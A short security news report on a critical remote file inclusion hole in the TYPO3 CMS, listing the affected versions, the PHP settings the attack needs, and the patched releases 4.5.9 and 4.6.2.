TYPO3 developers warn of critical hole
The TYPO3 developer team has warned that a critical hole in the TYPO3 Content Management System (CMS) potentially allows attackers to compromise a server. Insufficient checking of the AbstractController.php file's BACK_PATH parameter enables attackers to upload and execute arbitrary PHP scripts (Remote File Inclusion). The developers have been informed that attackers are already trying to intrude into users' servers on a large scale.
TYPO3 versions 4.5.0 to 4.5.8 as well as 4.6.0 and 4.6.1 are vulnerable – but only if the register_globals, allow_url_include and allow_url_fopen PHP variables are set. Only the last of these is enabled by default. Administrators should ensure that at least one of the three options is disabled. The developer team has provided a patch and released the corrected versions 4.5.9 and 4.6.2. Alternatively, users can implement a mod_security rule as described in the developers' advisory.